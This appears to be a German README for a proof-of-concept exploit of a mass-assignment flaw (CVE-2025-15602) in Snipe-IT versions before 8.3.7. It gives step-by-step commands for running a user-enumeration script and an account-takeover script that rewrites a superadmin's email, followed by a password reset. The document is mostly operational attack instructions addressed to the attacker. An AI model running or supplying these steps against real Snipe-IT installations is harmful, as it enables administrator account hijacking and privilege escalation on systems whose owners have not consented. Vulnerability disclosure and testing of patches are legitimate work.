
Massenzuweisungs-Schwachstelle in Snipe-IT < 8.3.7 führt zur Privilegienerweiterung
CVE-2025-15602-PoC ist ein Proof of Concept für die Schwachstelle CVE-2025-15602 in Snipe-IT. Ein Skript, um alle Benutzer aufzulisten, und ein Skript, um ein superadmin-Konto zu übernehmen.
Ein Benutzer hat nur das Recht, Benutzer zu bearbeiten; er kann dies missbrauchen, um Benutzer aufzulisten und ein superadmin-Konto zu übernehmen.
Vergiss nicht, die BASE_URL im Skript zu ändern, damit sie zu deiner snipe-it-Instanz passt.
Listet alle Benutzer der Instanz auf, um die ID des superadmin zu erhalten, den du übernehmen möchtest.
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100
Vergiss nicht, die BASE_URL im Skript zu ändern, damit sie zu deiner snipe-it-Instanz passt.
Übernimmt ein superadmin-Konto per Mass Assignment
WICHTIG: Du musst zuerst die richtigen Informationen aus list_users.py holen, sonst funktioniert es nicht. Die id, der username und first_name müssen exakt mit dem Zielkonto übereinstimmen.
python3 exploit_auth.py \
--target-id 1 \
--admin-username admin \
--admin-firstname Admin \
--admin-email [email protected] \
--attacker-username your_user \
--attacker-password your_pass
Danach kannst du das Passwort über die von dir festgelegte E-Mail zurücksetzen
pip install requests beautifulsoup4